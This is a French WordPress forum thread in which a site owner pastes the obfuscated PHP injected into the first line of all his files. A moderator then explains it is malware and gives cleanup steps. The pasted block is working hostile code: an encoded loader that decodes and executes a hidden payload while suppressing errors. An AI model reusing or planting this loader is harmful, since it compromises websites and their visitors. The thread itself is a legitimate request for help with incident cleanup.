Première ligne de mes fichiers PHP infectée (Créer un compte)

  • Statut : non résolu
4 sujets de 1 à 4 (sur un total de 4)
  • Auteur
    Messages
  • #564856
    klapiosus
    Participant
    Initié WordPress
    22 contributions

    Bonjour à tous.

    Je me rends compte que la première ligne de mes fichiers PHP sont tous identiques, ils ont été modifiés.
    Voilà ce que je retrouve dans tous mes fichiers

    <?php $sdnwravy = '4	120	x5f	125	x53	105	x52	137	x41	107	x45	`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW	x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:#<!%t2w>#]y74]273]y76]g)%	x24-	x24*<!~!	x24/%t2w/	x24)##-!#~<#7&6<.fmjgA	x27doj%6<	x7fw6*	x7f_*#fmjgk4`{6~6<%j^	x24-	x24tvctus)%	x24-	x24b8]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]~	x24<!%o:!>!	x242178}527}88:}334}472	x24<!%ff2!>!bssbz)	x!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3etpz!>!#]D6M7]K3#<%yy~!<**qp%!-uyfu%)3of)fepdof`57ftbc	x7f!|!*uyfu	x27k:!ftmf%tmw/	x24)%c*W%eN+#Qi	x5c1^W%c!>!~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]272	x6f	151	x64"))) { $egynfrn = "	x63	N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#	x24#-judovg}x;0]=])0#)U!	x27{**u%-#jt0}Z;0]=]0#ofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y]2598]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]}+;%-qp%)54l}	x27;%!<*#^#iubq#	x5cq%	x27jsv%6<C>^#zsfvr#	x5cq%7**^#zsfvr#tjyf`opjudovg	x22)!gj}1!}Z;^nbsbq%	x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO	x22#)fepmqyfA>2bd%)dfyfR	x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTO81#/#7e:55946-tr.984:75983:489]48y]#>m%:|:*r%:-t%)3of:opjudovg<as,"	x6d	163	x69	145")) or (strstr($uas,"	x72	]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss-Ez-1H*WCw*[!%rN}#QwTW%hIr	x5c1^-%r	x5c2^-%hOh/#00#W~>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx~!<2p%	x7f!~!<##!>!2p%Z<^2	x5116	x54"]); if ((strstr($u72!	x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!	x273]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!	x246767~6<Cwnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!7-NBFSUT`LDPT7-UFOJ`GB)fubfsdX)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!!*##>>X)!gjZ<#opo#>b%!**X)ufttj	x22)gj!|!*nbsbq%)323ldfidk!sq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssut $egynfrn(«  », $ieewywm); $xmsnb7UFH#	x27rfs%6~6<	x7f]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#Lfsqnpdov{h19275j{hnpd192{**#k#)tutjyf`x	x22l:!}V;3q%}U;y]}R;2]},;osvu2]18y]#>q%<#762]67y]562]38y]572goj{hA!osvufs!~<3,j%>j%!*3!	x27!hmg%!)!gj!<2,*j%!){return chr(ord($n)-1);} @error_reporting(0); $ieewywm = implodA7>q%6<	x7fw6*	x7f_*#fubfsdXk5`{75fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4162	x65	141	x74	145	x5f	146	x75	156	x63	164,#/q%>2q%<#g6R85,67R37,18R#rtolower($_SERVER["	x48	124	x5}_;#)323ldfid>}&;!osvufs}	x7f;!opjudovg}k~~9{d%:osvufs:!>!%yy)#}#-#	x24-	x24-tusqpt)%z-#:#*	x24-	x24!>%>/h%:<**#57]38y]47]67y]37]88y]27]28h#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hf	x5cq%)ufttj	x22)gj6<^#Y#	x5cq%	x27Y%6<.msv`ftsbqx27*&7-n%)utjm6<	x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutbk();}}g!)%z>>2*!%z>3<!fmtf!%z>2<!j!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubm!#]y38#-!%w:**<")));$xmsnbbk =opjudovg!|!**#j{hnpd#)tumpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpprxB%epnbss!>!bssbz)#44ec:649#-k#)usbut`cpV	x7f	x7f	x7f	x7f<u%V	x27{ftmfV	x7f<*X&Z&S{ftmfV	x7f<*XA252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!if((function_exists(f.)fepdof./#@#/qp%>5h%!<*:::W%c:>1<%b:>1<!gps)%j:>1<%j:=tfs%w6<	x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*iw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA	x22)7gj6<*QDU`MPT/*#npd/#)rrd/#00;quui#>.%!<***f	x27,*e	x27,*d	x27,*c	x27,*b	x27)fepdo!~!<b%	x7f!<X>b%Z<#opo#>b%	x69	157	x6e »; function kbahbbs($nmsvd}R;*msv%)}.;`UQPMSVD!-6	x61″])))) { $GLOBALS[ »	x61	156	x75	156	x61″]=1; $uas=st:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<j%j:.2^,%b:<!%c:>%s:	x5c%j:^<!%w`	x5c^>Ew:Qb:QcA	x27K6<	x7fw6*3qj%7>	x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopm6<pd%w6Z6<.5`hA	x27pd%6<pd%w6Z6<.4`hA	x27pd%6<pd	x24y4	x24-	x24]y8	x24-	x24]26	x24-	x24<%j,,*!|	x24-	x24gvodujpo!	x24-	x24y7	x24-	x24*-#1]#-bubE{h%)tpqsut>j%!*2>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!4-bubE{h%)sutcvt)esp>hmg%!<1>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6jojR	x27id%6<	x7fw6*	x7f_*#ujojRk3`{666~6<&w6<	x7fw6*CW&)7gj6<.[A	166	x3a	61	x31")) or (strstr($uas,"	x61	156	x64	16<!	x24-	x24gps)%j>1<%j=tj{fpe(array_map("kbahbbs",str_s)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>	x22!ftmbg)!gj<*#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#24]25	x24-	x24-!%	x24-	x24*!|!	x24-	x24	x5c]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<#"	x6f	142	x5f	163	x74	141	x72	164") && (!id%)uqpuft`msvd},;uqpuft`%i	x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%cvt-#w#)ldbqov>*ofmy%)utjm!|!*5!	x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-:::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssb%w6Z6<.3`hA	x27pd%6<pd%w6Z6<.2`hA	x27pd%6<C	x27pd%6|A	x273qj%6<*Y%)fnbozcYufhA	x272qj%6<^#zsfvr#	x5cq%7/7#@#7/7>!	x2400~:<h%_t%:osvufs:~:<*9-1-r%)s84:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf	fs}	x27;mnui}&;zepc}A;~!}	x7f;!|!}{;)gj}l;33bq}k;op)7fmjix6<C	x27&6<*rfs%7-K)fplit("%tjw!>!#]y84]275]y83]248]y84]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:	x5c:|:**#ppde#)tutjyf`4	x223}!+!<+{e%+*!*+fepdfe{h+{d%isset($GLOBALS["	x61	156	x75	15-#jt0*?]+^?]_	x5c}X	x24<!%tmw!>!#]y84]275]y83]273]y76]277|7**111127-K)ebfsX	x27u%%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#!	x24/%tjw/	x24)%	x24-66~6<&w6<	x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA	x2x27&6<	x7fw6*	x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuBSUOSVUFS,6<*msv%7-MSV,6<*)uujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%ZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!	x24/%tmw/	x24)%zW%h>EzH,2W%wN;#83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321/%	x24-	x24!>!fyqmpef)#	x24*<!%t::!>!	x24Ypp3)%cB%iN}#-!	x24/!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!g~928>>	x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275tt5297e:56-xr.985:52985-t.%ww2)%w`TW~	x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#msvd}+;!>!}	x27;!>>>!}_;gvc%}&;ftmbg}	x7f;!osvufs}w;*	x7f!>>	x22!pd%)STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSyhqwwtw’; $nbhdvoz=explode(chr((453-333)),substr($sdnwravy,(36229-30303),(156-122))); $guibceb = $nbhdvoz[0]($nbhdvoz[(5-4)]); $eyhryhf = $nbhdvoz[0]($nbhdvoz[(12-10)]); if (!function_exists(‘ceeazkczn’)) { function ceeazkczn($jkmtlbpu, $hshotrn,$iqblhxsmd) { $ymipgled = NULL; for($xkpqopow=0;$xkpqopow<(sizeof($jkmtlbpu)/2);$xkpqopow++) { $ymipgled .= substr($hshotrn, $jkmtlbpu[($xkpqopow*2)],$jkmtlbpu[($xkpqopow*2)+(5-4)]); } return $iqblhxsmd(chr((63-54)),chr((329-237)),$ymipgled); }; } $didbktjeu = explode(chr((191-147)),'3032,20,4309,41,5108,31,3361,57,2313,30,0,42,1500,26,1277,46,3933,50,689,37,2243,43,3301,34,2108,64,4011,27,4904,33,1580,54,3566,48,4599,52,4787,39,2566,54,5196,24,4877,27,5405,47,1904,21,3149,57,1710,30,3507,59,4651,59,969,50,2517,49,2172,32,5276,45,275,46,3108,41,1159,55,5377,28,3867,66,5321,56,806,37,3335,26,4350,25,5857,32,5889,37,5701,39,2699,64,2059,49,3700,25,1526,54,2620,45,4415,65,3791,28,3725,66,2793,24,1019,23,1471,29,1100,59,5220,34,3206,69,3052,28,4480,51,2817,63,2481,36,1835,38,4531,68,1634,31,42,55,3275,26,1776,59,550,56,1042,58,946,23,2343,55,5740,49,1959,24,2204,39,5057,51,4038,58,2910,67,5452,62,2286,27,1426,45,1983,45,4826,51,764,42,1740,36,5139,57,213,22,2977,55,4710,36,2445,36,4248,61,843,58,2028,31,1244,33,404,58,4154,43,321,30,2398,47,5254,22,3614,42,3656,44,3983,28,235,40,5640,61,606,33,4375,40,2880,30,1665,45,5514,65,1373,53,462,68,4197,51,5789,24,901,45,1214,30,4746,41,530,20,3819,48,1925,34,4937,67,97,61,639,50,351,53,5579,61,1323,50,158,55,3080,28,5004,53,3461,46,3418,43,2672,27,5813,44,4096,58,726,38,2763,30,1873,31,2665,7'); $ixfqvjfnac = $guibceb("",ceeazkczn($didbktjeu,$sdnwravy,$eyhryhf)); $guibceb=$sdnwravy; $ixfqvjfnac(""); $ixfqvjfnac=(735-614); $sdnwravy=$ixfqvjfnac-1; ?><?php

    Cela viendrait-il du fichier xmlrpc.php ?
    Je n’y comprends plus rien, pourtant mon site ne rencontre aucune difficulté à fonctionner, rien à changer dans ce sens.

    Merci d’avance les amis.

    Cordialement,
    Julien.

    #1062429
    Flobogo
    Modérateur
    Maître WordPress
    20164 contributions

    Bonjour,

    Oui, ce genre de « chiffrage martien » en début de fichier est très mauvais signe. Vous avez découvert le virus, mais il est peut-être encore inactif, ce qui explique que votre site paraisse « sain ».
    Ou bien il est en train d’envoyer des milliers de spams à partir de votre adresse mail …
    Bref, il faut vous débarrasser de cette salo**rie avant que ça ne fasse des dégâts !

    A faire avant toute chose : modifiez vos mots de passe d’accès au site / à la base de données / et au FTP.

    Puis, par PhpMyAdmin, faites une sauvegarde de votre base de données, au cas où …

    Ensuite :
    – par FTP (Filezilla), faites une sauvegarde du dossier wp-content/uploads, (vous en aurez besoin pour la ré-installation)
    – de même, faites une sauvegarde votre ou vos thèmes personnalisés dans wp-content/themes (si vous n’avez pas modifié les thèmes, supprimez-les) ainsi que du fichier wp-config.php et .htaccess
    – nettoyez le fichier wp-config.php et vos fichiers de thème : pour cela, il faut les ouvrir avec NotePad++ et supprimer la 1ère ligne composée d’une longue suite de chiffres et signes bizarres

    Puis :
    – téléchargez sur votre ordi une version neuve de WP et dézippez-la.
    – par FTP, supprimez toute votre installation et renvoyez l’installation neuve.
    A ce stade, ne touchez pas encore à votre site !
    – renvoyez par FTP votre fichier wp-config.php que vous aviez sauvegardé puis nettoyé, ainsi que vos fichiers de thème nettoyés à placer dans wp-content/themes
    Attention, ne renvoyez pas de fichier sans les avoir vérifiés et nettoyés du code malicieux
    – renvoyez votre dossier wp-content/uploads qui ne doit contenir que les dossiers par année/mois, et un fichier index.php (vérifiez qu’il ne soit pas infecté par le code malicieux)

    Pour finir :
    – retournez sur votre admin’ de site et vérifiez qu’aucun utilisateur fantôme (sans adresse mail) ne soit inscrit, et surtout pas avec le statut administrateur
    – ré-enregistrez vos permaliens pour générer un nouveau fichier .htaccess (vous pourrez le comparer à celui sauvegardé, et rajouter les lignes supplémentaires qui vous paraissent nécessaires si besoin)
    – ré-téléchargez vos plugins à partir du dépôt WordPress.

    Si besoin, quelques conseils à suivre :
    http://www.iceranking.com/wordpress-seo/guide-complet-pour-nettoyer-et-securiser-wordpress-apres-un-hacking/ (ancien mais toujours d’actualité)
    http://aide.monarobase.net/Nettoyer_un_Wordpress_pirat%C3%A9
    http://www.seomix.fr/securiser-wordpress-piratage/
    http://www.trucsdeblogueuse.com/piratage-recuperer-blog/

    Bon courage !

    #1062430
    Lumiere de Lune
    Participant
    Maître WordPress
    20531 contributions

    Pourrait-on avoir les réponses au questionnaire et la liste des plugins ?

    #1062431
    klapiosus
    Participant
    Initié WordPress
    22 contributions

    Bon à vous deux.

    Merci Flobogo pour ces informations précieuses, mais surtout d’avoir consacré du temps à m’expliquer les démarches à suivre. J’en suis très reconnaissant. De plus, je vais suivre les liens que vous m’avez indiqué.
    Cependant, je n’arrête pas de recevoir jusqu’à 5/6 SPAMS par jour. Je pense effectivement que ça vient de là.

    Pour répondre à Lumière de Lune, vous pouvez suivre ma liste de plugins sur cette image : ici.

    Voici les réponses du questionnaire :
    – Version de WordPress : 4.5.3 (mise à jour automatique)
    – Version de PHP/MySQL : 5.5
    – Thème utilisé : Simple game
    – Extensions en place :
    – Nom de l’hebergeur : Easy-hebergement
    – Adresse du site : URL.

    Encore merci.

    Cordialement.

4 sujets de 1 à 4 (sur un total de 4)
  • Vous devez être connecté pour répondre à ce sujet.